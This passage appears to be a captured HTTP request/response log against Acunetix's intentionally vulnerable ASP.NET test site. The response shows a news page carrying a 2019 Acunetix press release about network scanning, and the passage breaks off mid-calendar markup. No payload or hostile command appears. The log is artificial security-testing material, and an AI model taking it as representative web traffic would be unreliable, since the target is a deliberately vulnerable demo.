hbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" 